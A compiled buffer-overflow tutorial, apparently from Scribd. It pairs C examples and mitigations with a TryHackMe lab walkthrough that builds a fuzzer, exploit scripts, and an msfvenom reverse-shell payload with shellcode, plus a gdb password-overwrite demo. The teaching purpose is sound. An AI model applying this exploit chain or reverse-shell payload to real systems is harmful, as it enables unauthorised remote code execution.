0% found this document useful (0 votes)
2 views

Buffer Overflow Basics

Buffer overflow is a security vulnerability that occurs when a program writes more data to a buffer than it can hold, potentially allowing attackers to execute malicious code. Understanding buffer overflows is essential for cybersecurity beginners, as they highlight the importance of secure coding practices and proper input validation. The document discusses types of buffer overflows, examples of vulnerable code, and methods to exploit and analyze these vulnerabilities using tools like Immunity Debugger and fuzzing techniques.

Uploaded by

Menberu Munye
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
2 views

Buffer Overflow Basics

Buffer overflow is a security vulnerability that occurs when a program writes more data to a buffer than it can hold, potentially allowing attackers to execute malicious code. Understanding buffer overflows is essential for cybersecurity beginners, as they highlight the importance of secure coding practices and proper input validation. The document discusses types of buffer overflows, examples of vulnerable code, and methods to exploit and analyze these vulnerabilities using tools like Immunity Debugger and fuzzing techniques.

Uploaded by

Menberu Munye
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 51

Buffer Overflow Basics

Buffer overflow is a vulnerability where a program tries to store more data in a buffer than it can
hold, potentially overwriting important data or enabling an attacker to execute malicious code.
While these attacks are becoming less common due to better security practices, understanding
buffer overflows is still vital for beginners in cybersecurity. They can help one understand the
importance of secure coding practices and the severity of vulnerabilities arising from poor user
input handling.

What is Buffer?

A buffer is a temporary storage area in computer memory that holds data. Its primary function is
to reduce data loss and ensure that data is transmitted in the correct order. Buffers are commonly
used to store input data from users, data that is being read from files, or data that is being
transmitted over a network.

Buffer Overflow

Buffer overflow vulnerability occurs when software programs try to store more data in a buffer
than they can handle, which overwrites the adjacent memory locations causing unpredictable
behaviour and device vulnerabilities. This can allow attackers to execute malicious codes. Input
validation failures, programming bugs and unexpected user inputs cause buffer overflows.

One must have a fundamental understanding of computer memory to comprehend stack-based


overflow attacks. Computer memory is a storage location for data and instructions,
encompassing numeric values, characters, images, and any other data type. During the early
years of computing, data and instructions were stored in the same memory due to high costs,
preventing the wastage of memory resources.

Information is usually kept in sequential areas called memory pages in a computer’s memory.
These pages come in fixed sizes and contain a specific amount of data. When a program writes
information to a buffer, it reserves a set number of pages to hold that data. The excess data will
overwrite neighbouring pages if the program attempts to write more than the allotted pages can
accommodate. This can corrupt other data and cause the program to malfunction or perform
unexpectedly.
Let us now look at an example code to view buffer overflow in real-time. The code snippet
below has two header files, stdio.h and string.h. The stdio.h header file contains the input/output
operation function and string.h header file contains functions for manipulating strings. In the
primary process, we have declared the buffer variable with a size of 10 characters. The gets()
function reads a line of text from the console and stores it in the buffer array.

Now we can use C Compiler to run the code.

As seen in the output below, our program is executed but displays an error of “stack smashing
detected” when the input exceeds 10 characters. In the context of a buffer overflow, the program
attempts to write more data to a buffer than it can hold. The excess data is overwriting to
adjacent memory locations, including the stack. This could lead to buffer overflow vulnerability.

#include <stdio.h>

#include <string.h>

int main() {
char buffer[8];

printf("Enter your name: ");

gets(buffer);

printf("Hello, %s!\n", buffer);

return 0;

The fgets() function allows you to specify the maximum number of characters to read from the
input stream, thus preventing buffer overflow vulnerabilities.
We could use the ‘fgets’ function in our program to prevent issues. With the help of the ‘fgets’
function, we can restrict the string size of the input. To prevent buffer overflow attacks when
using fgets(), it’s essential to ensure that the buffer passed to the function is large enough to hold
the input data.

#include <stdio.h>

#include <string.h>

int main() {

char buffer[8];

printf("Enter your name: ");

fgets(buffer, sizeof(buffer), stdin);

printf("Hello, %s!\n", buffer);

return 0;

As we can see in the output below, the program is not terminated because of the fgets function,
which prevents buffer overflow.

Types of Buffer Overflow

Let us now look at some types of buffer overflows:


Stack-based buffer overflow: A stack-based buffer overflow denotes a security vulnerability
where a cyber-attacker overloads a buffer residing on the stack, exploiting it to change the return
address and execute arbitrary code.

Heap-based buffer overflow: A heap-based buffer overflow happens when an attacker overflows
a buffer on the heap. Such an attack can lead to exploiting a vulnerability of memory
management, which then causes arbitrary executable code to run.

Format string vulnerability: The format string vulnerability is seen when an attacker can
manipulate a program that uses functions like printf with format string arguments. This leads to
the overwriting of adjacent memory locations with arbitrary data.

Integer overflow: An occurrence known as “Integer overflow” happens when a value that
exceeds an integer’s data type capacity (8-bit to 64-bit) is assigned to it, causing buffer overflows
and memory corruption.

Off-by-one error: An Off-by-one error is a programming mistake that arises when a program
allocates a buffer with a size that is one byte smaller than the actual data that needs to be written.
This leads to data overflowing into adjacent memory locations, allowing attackers to execute
malicious code.

Exploitation

To demonstrate the Buffer Overflow Vulnerability, we will use the tryhackme room: Buffer
Overflow Prep.

After a port scan with nmap, port 1337 was found to be open and vulnerable. We can use netcat
to connect to that port.

nc MACHINE_IP 1337

For demonstration purposes, we will only be showing one instance (OVERFLOW 1); feel free to
go ahead and try out all 10 instances. Let’s jump into the next step.
To access the machine in the Tryhackme room, Tryhackme provided the following credentials to
log on to the machine using RDP:

Username: admin

Password: password

You can use any preferred tool to log in to the machine. Here we will be using remmina.
After successfully login right-click the Immunity Debugger icon on the Desktop and choose
“Run as administrator.”

Immunity Debugger is a popular debugger for Windows that can be used for analyzing buffer
overflow vulnerabilities and exploits. When using Immunity Debugger to analyze buffer
overflow vulnerabilities, one of the key features is the ability to set breakpoints and examine the
state of memory at various points in the program execution. This can help identify where the
overflow occurs in the code and what data is being overwritten.

The main window of Immunity Debugger is divided into four panels:

Disassembly Panel: This panel shows the disassembled code of the program, which can help
identify the location of the vulnerability and the path of execution leading up to it.

Registers Panel: This panel shows the state of the processor registers, which can help identify
how the program uses memory and where a buffer overflow may occur.

Memory Dump Panel: This panel shows a hex dump of the program’s memory, which can help
examine the overflow buffer’s contents.

Stack Panel: This panel shows the contents of the program’s stack, including any buffer,
overflows that may have occurred. It can also help identify the return address that an attacker
may be trying to overwrite.

The oscp.exe executable binaries are vulnerable to simple stack-based buffer overflows, where a
custom-written “oscp” binary has been created with ten different buffer overflows. Each
overflow has a distinct EIP offset and a predefined set of bad characters.

To open the “oscp.exe” binary file in Immunity Debugger, you should click on the open file icon
or go to the “File” menu and choose “Open.” After that, access the “vulnerable-apps” folder, the
folder located on the desktop of the admin user, and then the “oscp” folder. Finally, select the
“oscp” binary file and click the “Open” button.

To Start the binary, click on the red start button.


Fuzzing can be used to generate a large number of inputs that exceed the length of the buffer and
trigger an overflow. This can help identify the exact point in the program where the overflow
occurs and the data that is being overwritten.

On your Kali machine, create a file named fuzzer.py and insert the content given below into it.
This code is used for the fuzzing into the binary.

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.244.233"

port = 1337

timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:

try:

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:

s.settimeout(timeout)

s.connect((ip, port))

s.recv(1024)

print("Fuzzing with {} bytes".format(len(string) - len(prefix)))

s.send(bytes(string, "latin-1"))

s.recv(1024)

except:

print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))

sys.exit(0)

string += 100 * "A"

time.sleep(1)

Let us now run the fuzzing script with python3

python3 fuzzer.py
After running the fuzzing script, the program crashes at 2000 bytes.

We will now generate a cyclic pattern of random bytes that is 400 bytes longer than the string
that crashed the server from the Metasploit framework to minimize the error. We have generated
this to find the offset variable.

An offset refers to the distance between the beginning of a buffer and the location of a specific
data element within that buffer. It means a program attempts to write more data to a buffer than it
can hold. If an attacker can control the data written beyond the buffer’s end, they can overwrite
data in adjacent memory, such as the program’s return address or other important information.
By manipulating the offset of the data they provide, an attacker can control which memory
locations are overwritten and potentially gain unauthorized access or execute arbitrary code.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400
To resume the process in Immunity Debugger on the RDP connection, we need to reopen the
oscp.exe as done previously and use the same method. Then, click on the red play icon to start
the process. Make sure to perform this action each time you want to run the exploit.py file, which
you will need to run multiple times with incremental modifications.

Insert the above-generated payload into the payload value of the code exploit.py shown below
and run it.

import socket

ip = "10.10.244.233"

port = 1337

prefix = "OVERFLOW1 "

offset = 0
overflow = "A" * offset

retn = ""

padding = ""

payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1A..."

postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

s.connect((ip, port))

print("Sending evil buffer...")

s.send(bytes(buffer + "\r\n", "latin-1"))

print("Done!")

except:

print("Could not connect.")

ESP (Extended Stack Pointer) is a 32-bit register that indicates the topmost location of the stack
in memory during program execution. The stack is an area in memory utilized for temporarily
storing data and addresses. The ESP register is applied to insert and eliminate elements from the
stack, and since the stack memory grows in a downward direction, the ESP register starts with a
higher memory address and is decremented each time data is added to the stack

EBP (Extended Base Pointer) is a 32-bit register that is a reference for accessing local variables
and parameters on the stack in functions. It is a primary access point for the current function’s
stack frame. This frame contains essential elements like the function’s parameters, return
address, and local variables. Typically, the EBP register is set at the start of a function and
utilized to access local data and function parameters.

EIP (Extended Instruction Pointer) is a register consisting of 32 bits, which holds the memory
address where the instruction being executed by the processor is currently located. The processor
itself automatically updates the EIP register as instructions are executed. This makes it possible
for the program to execute its instructions sequentially.

In this diagram, the ESP register points to the top of the stack, which grows downward in
memory. The EBP register serves as a base pointer for accessing the current function’s stack
frame, while the EIP register contains the memory address of the currently executed instruction.

To control the EIP, an attacker needs to determine the exact offset at which the buffer overflow
occurs and the exact location in memory where they can place their malicious code. We can use
the mona python script to find the offset variable.

Mona Configuration

Mona is a Python script used with the Immunity Debugger for automating, identifying and
exploiting buffer overflow vulnerabilities.

Finding Bad Characters


Finding Jump Pointers

Generating Payloads

Creating Exploits

The mona script has been preinstalled on the Windows machine. If you want to install here is
the link.

Commands of mona:

!mona config -set workingfolder c:\mona\%p

The script causes the oscp.exe server to crash once again. Use Immunity Debugger to achieve
this by running a mona command in the command input box at the bottom of the screen. Make
sure to alter the distance to match the length of the previously generated pattern.

!mona findmsp -distance 2400


Buffer overflow vulnerabilities can be triggered by specific byte values known as “bad
characters.” These values can potentially cause programs to behave unpredictably or even crash.
Bad characters can include null bytes, newline characters, carriage returns, and other control
characters. Their presence in a payload may interfere with its intended execution.

Set the offset value to the EIP offset value in the exploit code. Set the retn value to 4 Bs(BBBB).

Generate a bytearray using mona, and exclude the null byte (\x00) by default.

!mona bytearray -b "\x00"

Copy the generated bytearray to the payload value of the exploit code.

The code will look similar to the code shown below. Restart oscp.exe in the Immunity debugger
and run the modified exploit.py script again.

import socket
ip = "10.10.244.233"

port = 1337

prefix = "OVERFLOW1 "

offset = 1978

overflow = "A" * offset

retn = "BBBB"

padding = ""

payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\
x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\
x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\
x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\
x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\
x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\
x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\
x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\
xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\
xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\
xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\
xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:

s.connect((ip, port))

print("Sending evil buffer...")

s.send(bytes(buffer + "\r\n", "latin-1"))

print("Done!")

except:

print("Could not connect.")

Make a note of the address to which the ESP register points and use it in the following mona
command:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

All the characters in the payload need not necessarily be bad. Sometimes bad characters could
cause the next byte to get corrupted or even affect the rest of the string. The first bad character in
the list is the null byte (\x00), but we already removed it from the file. A simple way to locate
badchars is to take the first bad character value and escape the second consecutive value. i.e.,
take\ x07 but escape the \x08 and do it for all like that. Repeat the bad character comparison until
the results status returns “Unmodified.” This indicates that no more badchars exist.

The initial character that should be avoided in the list is the null byte (\x00) because it has been
removed from the file. Any other characters that need to be avoided should be marked. Create a
new bytearray in mona that includes the newly marked characters and \x00. After that, modify
the payload variable in your exploit.py script and eliminate its newly marked characters.

Repeat comparing bad characters until the results indicate “Unmodified.”

This signals that no additional bad characters remain.

Making sure to update the -cpb option with all the badchars you identified (including \x00):

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"


In buffer overflow, a “jump point” refers to a specific location within the program’s memory
where an attacker can redirect the execution flow by overwriting the program’s return address on
the stack.

When a program executes a function, the location of the calling function is stored on the stack
for the processor to refer back to upon completion of the called function. However, if an attacker
can manipulate the return address by pointing it to a memory location under their control, they
can reroute the program’s execution flow toward their corrupt code.

To update your exploit.py script, select an address and assign it to the “retn” variable. However,
ensure you write the address backwards since the system follows a little-endian format. So, for
instance, if you are working with Immunity and the address is \x01\x02\x03\x04, write it as \x04\
x03\x02\x01 in your exploit.
Execute this msfvenom command on Kali, replacing the LHOST field with the IP address of
your Kali VPN and updating the -b option with all the bad characters identified:

msfvenom -p windows/shell_reverse_tcp LHOST=10.2.32.24 LPORT=4444 EXITFUNC=thread


-b "\x00\x07\x2e\xa0" -f c

You will need to allocate some memory space to unpack a payload that was probably generated
using an encoder. One way to do this is by assigning a value of 16 or more (\x90) bytes to the
padding variable.

padding = "\x90" * 16

Integrate the shellcode strings generated into your exploit.py script’s payload variable by using
the notation provided below in the code:
import socket

ip = "10.10.11.163"

port = 1337

prefix = "OVERFLOW1 "

offset = 1978

overflow = "A" * offset

retn = "\xaf\x11\x50\x62"

padding = "\x90" * 16

payload = ("\xda\xc4\xd9\x74\x24\xf4\x5d\xbe\xab\x9d\xc3\x98\x33\xc9"

"\xb1\x52\x31\x75\x17\x03\x75\x17\x83\x6e\x99\x21\x6d\x8c"

......................................................

"\x48\xca\xa6\x63\xd5\x9f\x0a\xee\xe6\x4a\x48\x17\x65\x7e"

"\x31\xec\x75\x0b\x34\xa8\x31\xe0\x44\xa1\xd7\x06\xfa\xc2"

"\xfd")

postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:

s.connect((ip, port))

print("Sending evil buffer...")

s.send(bytes(buffer + "\r\n", "latin-1"))

print("Done!")

except:

print("Could not connect.")

Restart the ‘oscp.exe’ process in Immunity, then execute the modified ‘exploit.py’ script again.

Open a Netcat listener on your Kali machine by utilizing the Local Port you had earlier defined
in the msfvenom command, which should be set at 4444 unless you have made any
modifications.

Here we can see that the exploit has been successful, and we have a reverse shell through a
buffer overflow.

Detecting Buffer Vulnerability

Buffer overflow vulnerabilities may be discovered by combining static and dynamic analysis
methods. The program’s source code or compiled binary is analyzed for potential vulnerabilities
when performing static analysis. On the other hand, dynamic analysis requires the program to be
executed and its behaviour to be observed to identify signs of vulnerability exploitation.
The identification of buffer overflow vulnerabilities can be achieved using various tools, such as
fuzzers, debuggers, and memory analysis tools. Fuzzers create many test cases with random
input data to explore vulnerabilities. Debuggers can help examine the program’s execution and
analyze the state of the memory and registers at every stage.

Prevention

Preventing buffer overflow attacks can be accomplished by implementing secure coding


practices, like validating user input, utilizing safe string manipulation functions, and accurately
calculating buffer sizes. Additionally, implementing runtime protections such as data execution
prevention (DEP), address space layout randomization (ASLR), stack canaries, and the heap can
help secure your system against such attacks.

A buffer overflow occurs when the size of information written to a memory location exceeds
what it was allocated. This can cause data corruption, program crashes, or even the execution of
malicious code.

While C, C++, and Objective-C are the main languages which have buffer overflow
vulnerabilities (as they deal more directly with memory than many interpreted languages), they
are the foundation of much of the internet.

Even if the code is written in a 'safe' language (like Python), if it calls on any libraries written in
C, C++, or Objective C, it could still be vulnerable to buffer overflows.

Memory Allocation

In order to understand buffer overflows, it's important to understand a little about how programs
allocate memory. In a C program, you can allocate memory on the stack, at compile time, or on
the heap, at run time.

To declare a variable on the stack: int numberPoints = 10;

Or, on the heap: int* ptr = malloc (10 * sizeof(int));

Buffer overflows can occur on the stack (stack overflow) or on the heap (heap overflow).
In general, stack overflows are more commonly exploited than heap overflows. This is because
stacks contain a sequence of nested functions, each returning the address of the calling function
to which the stack should return after the function has finished running. This return address can
be replaced with the instruction to instead execute a piece of malicious code.

As heaps less commonly store these return addresses, it's much harder to launch an exploit
(though not impossible). Memory on the heap typically contains program data and is
dynamically allocated as the program runs. This means that a heap overflow would likely have to
overwrite a function pointer – harder and less effective than a stack overflow.

As stack overflows are the more commonly exploited type of buffer overflow, we'll briefly dig
into exactly how they work.

Stack Overflows

When an executable is run, it runs within a process, and each process has its own stack. As the
process executes the main function, it will find both new local variables (which will be pushed
onto the top of the stack) and calls to other functions (which will create a new stackframe).

A diagram of a stack, for clarity:


https://en.wikipedia.org/wiki/Stack_(abstract_data_type)

So, what's a stackframe?

First, a call stack is basically the assembler code for a particular program. It's a stack of variables
and stackframes which tell the computer in what order to execute instructions. There will be a
stackframe for each function that hasn't yet finished executing, with the function which is
currently executing on the top of the stack.

In order to keep track of this, a computer keeps several pointers in memory:


Stack Pointer: Points to the top of the process call stack (or the last item pushed onto the stack).

Instruction Pointer: Points to the address of the next CPU instruction to be executed.

Base Pointer (BP): (also known as the frame pointer) Points to the base of the current
stackframe. It stays constant as long as the program is executing the current stackframe (though
the stack pointer will change).

For example, given the following program:

int main() {

int j = firstFunction(5);

return 0;

int firstFunction(int z) {

int x = 1 + z;

return x;

The call stack would look like this, right after firstFunction has been called and the statement int
x = 1+z has been executed:
Here, main called firstFunction (which is currently executing), so it's at the top of the call stack.
The return address is the memory address of the function which called it (this is held by the
instruction pointer as the stackframe is created). Local variables which are still in scope are also
on the call stack. As they are executed and go out of scope, they are 'popped' off the top of the
stack.

Thus, the computer is able to keep track of which instruction needs to be executed, and in which
order. A stack overflow is designed to overwrite one of these saved return addresses with its
own, malicious address.

Example Buffer Overflow Vulnerability (C):

int main() {

bufferOverflow();

bufferOverflow() {

char textLine[10];
printf("Enter your line of text: ");

gets(textLine);

printf("You entered: ", textLine);

return 0;

What are buffer overflow attacks?

Stack-based buffer overflow exploits are likely the shiniest and most common form of
exploit for remotely taking over the code execution of a process. These exploits were
extremely common 20 years ago, but since then, a huge amount of effort has gone into
mitigating stack-based overflow attacks by operating system developers, application
developers, and hardware manufacturers, with changes even being made to the standard
libraries developers use. Below, we will explore how stack-based overflows work and detail
the mitigation strategies that are put in place to try to prevent them.

Deep dive on stack-based buffer overflow attacks

Understanding stack-based overflow attacks involves at least a basic understanding of


computer memory. Memory in a computer is simply a storage place for data and instructions
—data for storing numbers, letters, images, and anything else, and instructions that tell the
computer what to do with the data. Both are stored in the same memory because memory
was prohibitively expensive in the early days of computing, and reserving it for one type of
storage or another was wasteful. Such an approach where data and instructions are stored
together is known as a Von Neumann architecture. It’s still in use in most computers to this
day, though as you will see, it is not without complications.

On the bright side, while security was not a driving factor in early computer and software
design, engineers realized that changing running instructions in memory was a bad idea, so
even as long ago as the ‘90s, standard hardware and operating systems were doing a good
job of preventing changes to instructional memory. Unfortunately, you don’t really need to
change instructions to change the behavior of a running program, and with a little
knowledge, writeable data memory provides several opportunities and methods for affecting
instruction execution.

Take this particularly contrived example:

#include <signal.h>

#include <stdio.h>

#include <string.h>

int main(){

char realPassword[20];

char givenPassword[20];

strncpy(realPassword, "ddddddddddddddd", 20);

gets(givenPassword);
if (0 == strncmp(givenPassword, realPassword, 20)){

printf("SUCCESS!\n");

}else{

printf("FAILURE!\n");

raise(SIGINT);

printf("givenPassword: %s\n", givenPassword);

printf("realPassword: %s\n", realPassword);

return 0;
}

If you don’t know the C programming language, that’s fine. The interesting thing about this
program is that it creates two buffers in memory called realPassword and givenPassword as
local variables. Each buffer has space for 20 characters. When we run the program, space
for these local variables is created in-memory and specifically stored on the stack with all
other local variables (and some other stuff). The stack is a very structured, sequential
memory space, so the relative distance between any two local variables in-memory is
guaranteed to be relatively small. After this program creates the variables, it populates
the realPassword value with a string, then prompts the user for a password and copies the
provided password into the givenPassword value. Once it has both passwords, it compares
them. If they match, it prints “ SUCCESS!” If not, it prints “ FAILURE!”

Here’s an example run:

msfuser@ubuntu:~$ ./example.elf

test

FAILURE!

givenPassword: test

realPassword: ddddddddddddddd
This is exactly as we’d expect. The password we entered does not match the expected
password. There is a catch here: The programmer (me) made several really bad mistakes,
which we will talk about later. Before we cover that, though, let’s open a debugger and peek
into memory to see what the stack looks like in memory while the program is executing:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaa

FAILURE!
Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb)

At this point, the program has taken in the data and compared it, but I added an interrupt in
the code to stop it before exiting so we could “look” at the stack. Debuggers let us see what
the program is doing and what the memory looks like on a running basis. In this case, we are
using the GNU Debugger (GDB). The GDB command ‘info frame’ allows us to find the
location in memory of the local variables, which will be on the stack:

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:


rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x400701

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb)

Now that we know where the local variables are, we can print that area of memory:
(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x00400701 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x00000000 0x00000000 0x00000000 0x00000000

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

.
As mentioned, the stack is sequentially stored data. If you know ASCII, then you know the
letter ‘a’ is represented in memory by the value 0x61 and the letter ‘d’ is 0x64. You can see
above that they are right next to each other in memory. The realPassword buffer is right
after the givenPassword buffer.

Now, let’s talk about the mistakes that the programmer (me) made. First, developers should
never, ever, ever use the gets function because it does not check to make sure that the size
of the data it reads in matches the size of the memory location it uses to save the data. It just
blindly reads the text and dumps it into memory. There are many functions that do the exact
same thing—these are known as unbounded functions because developers cannot predict
when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period where
security was not as imperative as it is today. These functions must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.

Taking a look at the hack

We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it
should, the first thing to try is to give it more data than the buffer can hold. The buffers are
20 characters, so let’s start with 30 characters:

msfuser@ubuntu:~$ gdb example.elf

.
.

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: ddddddddddddddd

Program received signal SIGINT, Interrupt.


0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2


Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x00006161

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000


0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

0x7fffffffde30: 0x00000000 0x00000000 0xffffdf08 0x00007fff

We can see clearly that there are 30 instances of ‘a’ in memory, despite us only specifying
space for 20 characters. We have overflowed the buffer, but not enough to do anything.
Let’s keep trying and try 40 instances of ‘a.’

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

.
.

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x64646400 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20
characters and we wrote eight characters to the realPassword buffer, we need to write 12
more characters. So, let’s try again, but with 52 instances of ‘a’ this time:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

SUCCESS!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
realPassword: aaaaaaaaaaaaaaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x40072d

called by frame at 0x7fffffffde30


source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161


0x7fffffffde00: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde10: 0x61616161 0x00007f00 0x00000000 0x00000000

Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow
attack. In this case, we used it to alter variables within a program, but it can also be used to
alter metadata used to track program execution.

Altering metadata

Using stack overflow attacks against program metadata to affect code execution is not much
different than the above example. The key is understanding the concept of a return value.
Like us, computers do a lot of things at once and will stop working on one thing to do
another before returning to the original task. When the computer executes instructions
located somewhere else in the instruction memory, it stores a note of where it was before it
starts executing so that it knows where to return when it finishes the new task. That note—
called the return address—is simply the address in instructional memory where it returns
and starts executing instructions.

The computer is brilliant, and if you can change the value of the return address, you can
send it wherever you like. Exploits will often write the instructions in the same buffer they
overflow and then point execution back to the buffer itself, which allows an attacker to hand
a program code and then force it to execute the code.
One caveat is that none of these examples will work on remotely modern operating systems
anymore. Operating system developers, application developers, hardware engineers, and
even compilers have all reacted and made performing stack overflow attacks much harder.

What’s being done to mitigate these exploits?

It has been nearly 20 years since the heyday of stack overflow attacks, and there are a lot of
protections in place that prevent them from working as well now as they did back then.
Some of these protections include stack canaries, Address Space Layout Randomization
(ASLR), compiler warnings, and hardware changes to prevent execution of code on the
stack. (Side note: For a historical discussion on ASLR on Windows, see this most excellent
Twitter thread by John Lambert .)

